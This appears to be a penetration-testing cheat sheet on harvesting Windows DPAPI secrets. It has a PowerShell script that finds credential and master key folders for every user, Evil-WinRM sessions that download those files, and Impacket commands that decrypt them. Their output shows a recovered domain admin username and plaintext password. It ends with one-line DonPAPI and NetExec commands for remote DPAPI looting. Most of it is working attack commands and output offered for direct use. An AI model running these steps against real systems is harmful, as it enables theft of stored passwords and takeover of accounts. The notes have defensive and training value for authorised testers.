DPAPI

The Data Protection Application Programming Interface or DPAPI is a set of APIs in Windows operating systems used to encrypt and decrypt DPAPI data blobs on a per-user basis for Windows OS features and various third-party applications. Here are just a few examples of applications that use DPAPI and what they use it for:

Applications	Use of DPAPI
Internet Explorer	Password form auto-completion data (username and password for saved sites).
Google Chrome	Password form auto-completion data (username and password for saved sites).
Outlook	Passwords for email accounts.
Remote Desktop Connection	Saved credentials for connections to remote machines.
Credential Manager	Saved credentials for accessing shared resources, joining Wireless networks, VPNs and more.

DPAPI Discovery

Windows/DPAPI automated discovery - xtromera's blogxtromera.github.io

# Function to check if a directory exists and handle access errors silently
function Check-Directory {
    param ([string]$Path)
    try {
        if (Test-Path -Path $Path -ErrorAction SilentlyContinue) {
            return $true
        }
    } catch {
        return $false
    }
    return $false
}

# Function to scan for DPAPI-related paths
function Scan-DPAPI {
    $basePath = "C:\Users"

    # Check if base path exists
    if (!(Test-Path $basePath -ErrorAction SilentlyContinue)) {
        Write-Error "Base path $basePath does not exist!"
        return
    }

    # Get all user directories
    $userDirs = Get-ChildItem -Path $basePath -Directory -ErrorAction SilentlyContinue | Select-Object -ExpandProperty FullName

    # List of DPAPI-related paths to check for each user
    $pathsToCheck = @(
        "\AppData\Roaming\Microsoft\Protect",        # User-specific DPAPI Master Keys
        "\AppData\Local\Microsoft\Credentials",     # Windows Credential Manager
        "\AppData\Roaming\Microsoft\Vault",         # Credential Vault
        "\AppData\Local\Microsoft\Edge\User Data",  # Microsoft Edge Data
        "\AppData\Roaming\Microsoft\Internet Explorer" # Internet Explorer Data
    )

    # Scan each user directory
    foreach ($userDir in $userDirs) {
        Write-Host "Scanning user directory: $userDir" -ForegroundColor Cyan
        try {
            # Ensure we can access the user directory
            if (!(Test-Path $userDir -ErrorAction SilentlyContinue)) {
                Write-Warning "No permissions on directory of user: $userDir"
                continue
            }

            foreach ($subPath in $pathsToCheck) {
                $fullPath = Join-Path -Path $userDir -ChildPath $subPath
                if (Check-Directory -Path $fullPath) {
                    Write-Host "Found DPAPI-related path: $fullPath" -ForegroundColor Green
                }
            }
        } catch {
            Write-Warning "No permissions on directory of user: $userDir"
        }
    }

    # Check system-wide DPAPI paths
    $systemPaths = @(
        "C:\Windows\System32\Microsoft\Protect" # System-Wide DPAPI Keys
    )
    Write-Host "Scanning system-wide paths..." -ForegroundColor Yellow
    foreach ($sysPath in $systemPaths) {
        if (Check-Directory -Path $sysPath) {
            Write-Host "Found DPAPI-related path: $sysPath" -ForegroundColor Green
        } else {
            Write-Warning "No permissions or path not accessible: $sysPath"
        }
    }
}

# Run the DPAPI scan
Scan-DPAPI

.\ScanDPAPI.ps1
Scanning user directory: C:\Users\Administrator
Scanning user directory: C:\Users\C.Neri
Found DPAPI-related path: C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect
Found DPAPI-related path: C:\Users\C.Neri\AppData\Local\Microsoft\Credentials
Found DPAPI-related path: C:\Users\C.Neri\AppData\Roaming\Microsoft\Vault
Found DPAPI-related path: C:\Users\C.Neri\AppData\Local\Microsoft\Edge\User Data
Found DPAPI-related path: C:\Users\C.Neri\AppData\Roaming\Microsoft\Internet Explorer
Scanning user directory: C:\Users\c.neri_adm
Scanning user directory: C:\Users\Public
Scanning system-wide paths...
Found DPAPI-related path: C:\Windows\System32\Microsoft\Protect

Impacket

*Evil-WinRM* PS C:\Users\username\Documents> cd C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials
*Evil-WinRM* PS C:\Users\username\AppData\Roaming\Microsoft\Credentials> dir -h


    Directory: C:\Users\username\AppData\Roaming\Microsoft\Credentials


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          6/7/2024   5:08 PM            430 C4BB96844A5C9DD45D5B6A9859252BA6


*Evil-WinRM* PS C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials> download C4BB96844A5C9DD45D5B6A9859252BA6

*Evil-WinRM* PS C:\Users\username\AppData\Roaming\Microsoft\Protect> dir


    Directory: C:\Users\username\AppData\Roaming\Microsoft\Protect


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d---s-          6/7/2024   1:17 PM                S-1-5-21-4024337825-2033394866-2055507597-1115

*Evil-WinRM* PS C:\Users\username\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> dir -h
 
 
    Directory: C:\Users\username\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115
 
 
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-         12/4/2024   2:46 AM            740 1fe00192-86ec-4689-a4f2-f8c2336edaf4
-a-hs-          6/7/2024   1:17 PM            740 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
-a-hs-          6/7/2024   1:17 PM            740 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
-a-hs-         12/4/2024   2:46 AM             24 Preferred
 
*Evil-WinRM* PS C:\Users\username\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> download 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b

User password known - If not bruteforce

$ impacket-dpapi masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password password
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a

$ impacket-dpapi credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2024-06-07 15:08:23
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000001 (CRED_TYPE_GENERIC)
Target      : LegacyGeneric:target=admin_acc
Description : 
Unknown     : 
Username    : domain\username_adm
Unknown     : P4ssW0rd0312

Bruteforce masterkey

GitHub - ProcessusT/MasterKeyBrute: Bruteforce DPAPI encrypted MasterKey File from Windows Credentials ManagerGitHub

Tools

Require Local admin privileges or DA privs

dploot

GitHub - zblurx/dploot: DPAPI looting remotely and locally in PythonGitHub

dploot

Donpapi

exegol-CPTS /workspace # DonPAPI "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET"

Netexec - CME

NetExec - CME

nxc smb <ip> -u user -p password --dpapi

nxc smb <ip> -u user -p password --dpapi cookies

nxc smb <ip> -u user -p password --dpapi nosystem

Dump DPAPI | NetExecwww.netexec.wiki

dpapidump.py

LSA Secrets: revisiting secretsdumpSynacktiv

https://github.com/fortra/impacket/pull/1898/commits/e8f437200248b641b3baa3ce48505232287150e3#diff-7b05ddc04bf27afd35a49ab42419b2aa8f56c01f70d3517fc6de04317be05714github.com